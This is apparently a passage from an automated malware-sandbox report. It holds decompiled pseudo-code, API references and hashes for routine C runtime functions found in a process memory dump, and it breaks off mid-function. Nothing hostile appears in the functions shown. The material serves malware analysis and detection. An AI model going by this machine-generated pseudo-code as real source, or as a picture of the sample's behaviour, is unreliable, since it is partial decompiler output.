								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E0040A0BC(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00415216(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E0040AFF0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E0041A308(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00415216(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0040AFF0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x0041b93d
0x0041b93e
0x0041b93f
0x0041b946
0x0041b94b
0x0041b951
0x0041b957
0x0041b95d
0x0041b960
0x0041b960
0x0041b963
0x0041b965
0x0041b965
0x0041b963
0x0041b967
0x0041b96c
0x0041b973
0x0041b976
0x0041b976
0x0041b992
0x0041b998
0x0041b99d
0x0041bb30
0x0041bb3b
0x0041bb43
0x0041b9a3
0x0041b9a3
0x0041b9a6
0x0041b9ab
0x0041b9af
0x0041ba03
0x0041ba03
0x0041ba05
0x0041ba07
0x0041bb25
0x0041bb25
0x0041bb27
0x0041bb28
0x0041bb2e
0x00000000
0x0041bb2e
0x0041ba18
0x0041ba1e
0x0041ba20
0x00000000
0x00000000
0x0041ba26
0x0041ba38
0x0041ba3d
0x0041ba41
0x00000000
0x00000000
0x0041ba4e
0x0041ba88
0x0041ba8b
0x0041ba8e
0x0041ba90
0x0041ba92
0x0041ba94
0x0041bae0
0x0041bae0
0x0041bae2
0x0041bae2
0x0041bae4
0x0041bb1e
0x0041bb1f
0x00000000
0x0041bb24
0x0041baf8
0x0041bafd
0x0041baff
0x00000000
0x00000000
0x0041bb03
0x0041bb04
0x0041bb05
0x0041bb08
0x0041bb44
0x0041bb47
0x0041bb0a
0x0041bb0a
0x0041bb0b
0x0041bb0b
0x0041bb18
0x0041bb1a
0x0041bb1c
0x0041bb4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bb1c
0x0041ba96
0x0041ba99
0x0041ba9b
0x0041ba9d
0x0041ba9f
0x0041baa2
0x0041baa7
0x0041bac2
0x0041bac4
0x0041bace
0x0041bad0
0x0041bad1
0x0041bad3
0x00000000
0x00000000
0x0041bad5
0x0041badb
0x0041badb
0x00000000
0x0041badb
0x0041baa9
0x0041baab
0x0041baaf
0x0041bab4
0x0041bab6
0x0041bab8
0x00000000
0x00000000
0x0041baba
0x00000000
0x0041baba
0x0041ba50
0x0041ba55
0x00000000
0x00000000
0x0041ba5b
0x0041ba5d
0x00000000
0x00000000
0x0041ba79
0x0041ba7d
0x00000000
0x00000000
0x00000000
0x0041ba83
0x0041b9b6
0x0041b9b8
0x0041b9ba
0x0041b9c2
0x0041b9e1
0x0041b9e3
0x0041b9ed
0x0041b9ef
0x0041b9f0
0x0041b9f2
0x00000000
0x00000000
0x0041b9f8
0x0041b9fe
0x0041b9fe
0x00000000
0x0041b9fe
0x0041b9c6
0x0041b9ca
0x0041b9cf
0x0041b9d3
0x00000000
0x00000000
0x0041b9d9
0x00000000
0x0041b9d9

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000010,?,?,?,?,?,0041BB89,00000001,00000001,E8F44589), ref: 0041B992
__alloca_probe_16.LIBCMT ref: 0041B9CA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0041BB89,00000001,00000001,E8F44589,00000010,?,?), ref: 0041BA18
__alloca_probe_16.LIBCMT ref: 0041BAAF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000010,E8F44589,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0041BB12
__freea.LIBCMT ref: 0041BB1F

Part of subcall function 00415216: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00415248

__freea.LIBCMT ref: 0041BB28
__freea.LIBCMT ref: 0041BB4D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 7b0b8f50481962e67ecb6422dd9b4c1b7a2d4dedb68dbf8df14340881b248946
Instruction ID: e49f67d6baef9d43063506307b149fafbb1dda70e1aeca012a42a63edbf81915
Opcode Fuzzy Hash: 7b0b8f50481962e67ecb6422dd9b4c1b7a2d4dedb68dbf8df14340881b248946
Instruction Fuzzy Hash: F4511372610206ABDB258E61CC81EFF77A9EF44754F14426EFD04E6644EB38EC80C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA87, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041FA87(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				signed int _t76;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E00414C69(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E00415216(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E004155C5(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x438170; // 0x438168
								 *_t133 = _t57;
								_t58 =  *0x438174; // 0x4397d8
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x438178; // 0x4397d8
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x4381a0; // 0x43816c
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x4381a4; // 0x4397dc
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E00415216(_t107, 4);
							_v20 = _t134;
							E004155C5(0);
							if(_t134 == 0) {
								L11:
								E004155C5(_v8);
								E004155C5(_v12);
								return _v16;
							}
							_push(_v8);
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t76 = E0041C647(_t121);
							_t78 = E0041C647(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
							_v16 = _v8 + 8;
							_t82 = E0041C647(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0x10, _v8 + 8, 1);
							_t86 = E0041C647(_t121,  &_v28, 2,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8 + 0x30, _t128);
							if((E0041C647(_t121,  &_v28, 2, _t128, 0xf, _v8 + 0x34, 0xe) | _t76 | _t78 | _t82 | _t86) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0041FA1E(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E004155C5(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x438170;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E004155C5( *((intOrPtr*)(_t100 + 0x7c)));
							E004155C5( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x0041fa87
0x0041fa90
0x0041fa97
0x0041fa9a
0x0041faa3
0x0041fac2
0x0041fac5
0x0041faca
0x0041fad1
0x0041fae4
0x0041fae5
0x0041faee
0x0041faf0
0x0041faf3
0x0041faf6
0x0041fafc
0x0041faff
0x0041fb12
0x0041fb1a
0x0041fc74
0x0041fc77
0x0041fc7c
0x0041fc7e
0x0041fc83
0x0041fc86
0x0041fc8b
0x0041fc8e
0x0041fc93
0x0041fc96
0x0041fc9b
0x0041fc04
0x0041fc0a
0x0041fc0e
0x0041fc10
0x0041fc10
0x00000000
0x0041fc0e
0x0041fb27
0x0041fb2a
0x0041fb2d
0x0041fb36
0x0041fbcb
0x0041fbce
0x0041fbd7
0x00000000
0x0041fbe0
0x0041fb3c
0x0041fb3f
0x0041fb44
0x0041fb50
0x0041fb67
0x0041fb78
0x0041fb81
0x0041fb98
0x0041fbbc
0x0041fbe6
0x0041fbf9
0x0041fbea
0x0041fbee
0x0041fc61
0x00000000
0x00000000
0x0041fc63
0x0041fc65
0x0041fc68
0x0041fc6a
0x0041fc6d
0x0041fbf4
0x0041fbf6
0x0041fbf8
0x0041fbf8
0x0041fbf8
0x0041fbee
0x0041fbfe
0x0041fc01
0x00000000
0x0041fc01
0x0041fbc1
0x0041fbc6
0x00000000
0x0041fbca
0x0041fb04
0x00000000
0x0041fb0c
0x00000000
0x0041faad
0x0041faad
0x0041faaf
0x0041fab2
0x0041fc12
0x0041fc12
0x0041fc1a
0x0041fc1c
0x0041fc1c
0x0041fc24
0x0041fc29
0x0041fc2d
0x0041fc32
0x0041fc3d
0x0041fc43
0x0041fc2d
0x0041fc47
0x0041fc4c
0x0041fc52
0x00000000
0x0041fc52

APIs

_free.LIBCMT ref: 0041FAF6
_free.LIBCMT ref: 0041FB04
_free.LIBCMT ref: 0041FC32
_free.LIBCMT ref: 0041FC3D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a992036da645d0213a2a5022499706be9c449e1f15158f03039c4c35a90504f5
Instruction ID: 42927bb557c0be3f581988e9d85ff4f318d9ed2f58a5d49acbc9d9b405aa8761
Opcode Fuzzy Hash: a992036da645d0213a2a5022499706be9c449e1f15158f03039c4c35a90504f5
Instruction Fuzzy Hash: E8619071904205EFDB20DFA9C841BDABBF5EF44710F14417BE944EB241E738A9869B98

Uniqueness

Uniqueness Score: -1.00%

Function 00418F54, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00418F54(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x438070; // 0xf2c84916
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x439a78 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x439a78 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00414CC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x439a78 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x439a78 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x439a78 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E0041CD90( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E0041CD90();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E0040AEA8();
				return _t136;
			}

0x00418f5c
0x00418f63
0x00418f66
0x00418f6e
0x00418f72
0x00418f7e
0x00418f81
0x00418f84
0x00418f8b
0x00418f93
0x00418f96
0x00418f9c
0x00418fa2
0x00418fa7
0x00418fa9
0x00418fac
0x00418fb1
0x00418fbb
0x00418fc2
0x00418fc5
0x00418fcc
0x00418fd3
0x00418fff
0x00419025
0x00419027
0x00000000
0x00419001
0x00419004
0x004190cb
0x004190d7
0x004190e2
0x004190e7
0x0041900a
0x00419011
0x00419016
0x0041901c
0x00419022
0x00000000
0x00419022
0x0041901c
0x00419004
0x00418fd5
0x00418fd9
0x00418fdc
0x00418fe2
0x00418fe4
0x00418fe7
0x00418feb
0x00419028
0x0041902b
0x0041902c
0x00419031
0x00419037
0x0041903d
0x0041904c
0x00419052
0x00419058
0x0041905d
0x00419079
0x004190ec
0x004190f2
0x0041907b
0x00419083
0x0041908c
0x00419092
0x00000000
0x00419094
0x00419096
0x00419099
0x004190b2
0x00000000
0x004190b4
0x004190b8
0x004190ba
0x004190bd
0x00000000
0x004190bd
0x004190b8
0x004190b2
0x00419092
0x0041908c
0x00419079
0x0041905d
0x00419037
0x00000000
0x004190c0
0x004190c0
0x004190f4
0x004190fe
0x00419106

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,004196C9,?,?,?,?,?,?), ref: 00418F96
__fassign.LIBCMT ref: 00419011
__fassign.LIBCMT ref: 0041902C
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00419052
WriteFile.KERNEL32(?,?,00000000,004196C9,00000000,?,?,?,?,?,?,?,?,?,004196C9,?), ref: 00419071
WriteFile.KERNEL32(?,?,00000001,004196C9,00000000,?,?,?,?,?,?,?,?,?,004196C9,?), ref: 004190AA

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1b05ef7ca0a44d44d34f63f10f76765f1de4dcc0ed666cde1b8aa6a36add3842
Instruction ID: 9ff472c632152079663f2f8ecad9a1d3acf677037c90e1ab57d77865f3db24ce
Opcode Fuzzy Hash: 1b05ef7ca0a44d44d34f63f10f76765f1de4dcc0ed666cde1b8aa6a36add3842
Instruction Fuzzy Hash: 0551A371E002459FDB10CFA8D895AEEBBF4EF09300F14416BE955E7251D7349D81CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF5C, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FF5C(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0041FCA3(_t45, 7);
					E0041FCA3(_t45 + 0x1c, 7);
					E0041FCA3(_t45 + 0x38, 0xc);
					E0041FCA3(_t45 + 0x68, 0xc);
					E0041FCA3(_t45 + 0x98, 2);
					E004155C5( *((intOrPtr*)(_t45 + 0xa0)));
					E004155C5( *((intOrPtr*)(_t45 + 0xa4)));
					E004155C5( *((intOrPtr*)(_t45 + 0xa8)));
					E0041FCA3(_t45 + 0xb4, 7);
					E0041FCA3(_t45 + 0xd0, 7);
					E0041FCA3(_t45 + 0xec, 0xc);
					E0041FCA3(_t45 + 0x11c, 0xc);
					E0041FCA3(_t45 + 0x14c, 2);
					E004155C5( *((intOrPtr*)(_t45 + 0x154)));
					E004155C5( *((intOrPtr*)(_t45 + 0x158)));
					E004155C5( *((intOrPtr*)(_t45 + 0x15c)));
					return E004155C5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0041ff62
0x0041ff67
0x0041ff70
0x0041ff7b
0x0041ff86
0x0041ff91
0x0041ff9f
0x0041ffaa
0x0041ffb5
0x0041ffc0
0x0041ffce
0x0041ffdc
0x0041ffed
0x0041fffb
0x00420009
0x00420014
0x0042001f
0x0042002a
0x00000000
0x0042003a
0x0042003f

APIs

Part of subcall function 0041FCA3: _free.LIBCMT ref: 0041FCCC

_free.LIBCMT ref: 0041FFAA

Part of subcall function 004155C5: HeapFree.KERNEL32(00000000,00000000,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?), ref: 004155DB
Part of subcall function 004155C5: GetLastError.KERNEL32(?,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?,?), ref: 004155ED

_free.LIBCMT ref: 0041FFB5
_free.LIBCMT ref: 0041FFC0
_free.LIBCMT ref: 00420014
_free.LIBCMT ref: 0042001F
_free.LIBCMT ref: 0042002A
_free.LIBCMT ref: 00420035

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9b5d0190fecde7c04b47490d91e6799872160d4b0822393313fc1c142ea5c548
Instruction ID: f296c44bb319cbd472ad8f3524965f6bd8a546b861666798d4a04e44f5d07470
Opcode Fuzzy Hash: 9b5d0190fecde7c04b47490d91e6799872160d4b0822393313fc1c142ea5c548
Instruction Fuzzy Hash: 22114271540F08FAD520B7B2CC07FCB77EE6F4070CF40082EB69D66056F6AAB58A5694

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3DD, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040F3DD(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x4380a0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0040F019(__eflags,  *0x4380a0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0040F053(__eflags,  *0x4380a0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00414C69(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0040F053(__eflags,  *0x4380a0, 0);
								} else {
									__eflags = E0040F053(__eflags,  *0x4380a0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004155C5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x0040f3e4
0x0040f3f7
0x0040f3fe
0x0040f401
0x0040f404
0x0040f41d
0x0040f41d
0x0040f406
0x0040f406
0x0040f408
0x0040f412
0x0040f418
0x0040f419
0x0040f41b
0x0040f42b
0x0040f42f
0x0040f431
0x0040f445
0x0040f445
0x0040f44e
0x0040f433
0x0040f441
0x0040f443
0x0040f457
0x0040f459
0x0040f459
0x00000000
0x00000000
0x00000000
0x0040f443
0x0040f45c
0x00000000
0x00000000
0x00000000
0x0040f41b
0x0040f408
0x0040f464
0x0040f46e
0x0040f3e6
0x0040f3e8
0x0040f3e8

APIs

GetLastError.KERNEL32(?,?,0040F3D4,0040CB17,00436078,00000010,0040C2DF,?,?,?,?,?,00000000,?), ref: 0040F3EB
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040F3F9
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040F412
SetLastError.KERNEL32(00000000,0040F3D4,0040CB17,00436078,00000010,0040C2DF,?,?,?,?,?,00000000,?), ref: 0040F464

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f988075abefc2086af18cb501c5ee744940ae4c55fd293df3175aa2d284f48ad
Instruction ID: 27572a6383b916ec8e4e6e75d8efa0f98ff45c76fd1a1163b54af87ff73eba84
Opcode Fuzzy Hash: f988075abefc2086af18cb501c5ee744940ae4c55fd293df3175aa2d284f48ad
Instruction Fuzzy Hash: FB014C322093119EE6343BB5BC8566726A5EB51B7C320023FF914606E2EF7D1C0D924C

Uniqueness

Uniqueness Score: -1.00%

Function 0040141C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040141C(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* __ebx;
				void* _t48;
				intOrPtr _t51;
				void* _t53;

				_t49 = __edi;
				_t48 = __edx;
				E00424FAC(E00425B96, __ecx, __edi, __esi, _t53, __fp0);
				_push(__esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E00409149(__ecx, 0);
				 *(_t53 - 4) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *(_t53 - 4) = 1;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *(_t53 - 4) = 2;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *(_t53 - 4) = 3;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *(_t53 - 4) = 4;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *(_t53 - 4) = 5;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				 *(_t53 - 4) = 6;
				_t58 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					E00401163("bad locale name");
					 *(_t53 - 4) = 7;
					 *((intOrPtr*)(_t53 - 0x1c)) = 0x427314;
					 *(_t53 - 4) = 6;
					E0040CD4A(_t53 - 0x1c, 0x436724);
				}
				E004094EA(0, _t48, _t49, _t58, _t51,  *((intOrPtr*)(_t53 + 8)));
				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t51;
			}

0x0040141c
0x0040141c
0x00401421
0x0040142a
0x0040142b
0x00401430
0x00401433
0x00401438
0x0040143b
0x0040143e
0x00401441
0x00401445
0x00401448
0x0040144b
0x00401451
0x00401454
0x00401458
0x0040145c
0x0040145f
0x00401463
0x00401467
0x0040146a
0x0040146d
0x00401471
0x00401474
0x00401477
0x0040147b
0x0040147e
0x00401488
0x0040148d
0x00401491
0x00401498
0x004014a5
0x004014a5
0x004014ae
0x004014b5
0x004014c0
0x004014ca

APIs

__EH_prolog.LIBCMT ref: 00401421
std::_Lockit::_Lockit.LIBCPMT ref: 00401433
std::exception::exception.LIBCONCRT ref: 00401488

Part of subcall function 00401163: ___std_exception_copy.LIBVCRUNTIME ref: 0040118A

__CxxThrowException@8.LIBVCRUNTIME ref: 004014A5

Part of subcall function 0040CD4A: RaiseException.KERNEL32(?,?,?,004096F0,?,?,?,?,?,?,?,?,004096F0,?,00435ED0), ref: 0040CDA9

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004014AE

Strings

bad locale name, xrefs: 00401480

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$ExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copystd::exception::exception
String ID: bad locale name
API String ID: 1828584202-1405518554
Opcode ID: bf9ede1531f34108591d3b392e09e7cdee26a95139f0f52956e6123a06db37d0
Instruction ID: 7f2f79be7eb5a2722379b25031633351e893bea1997da8b216c8c0c5d149589d
Opcode Fuzzy Hash: bf9ede1531f34108591d3b392e09e7cdee26a95139f0f52956e6123a06db37d0
Instruction Fuzzy Hash: 5A217C71805784DEC721DFAA854068EFFE0AF29304F5086AFD099A7682C3785A04CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004149A3, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004149A3(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t122;
				signed int _t124;
				intOrPtr _t125;
				signed int _t127;
				intOrPtr _t129;
				signed int _t130;
				void* _t134;
				void* _t135;
				void* _t137;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t122 = 0;
					_t67 = E0041BDFC( &_v8, 0, 0, _a8, 0x7fffffff);
					_t135 = _t134 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t127 = E00414C69(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t127;
						if(_t127 == 0) {
							L11:
							E004155C5(_t127);
							_t70 = _t122;
							goto L12;
						} else {
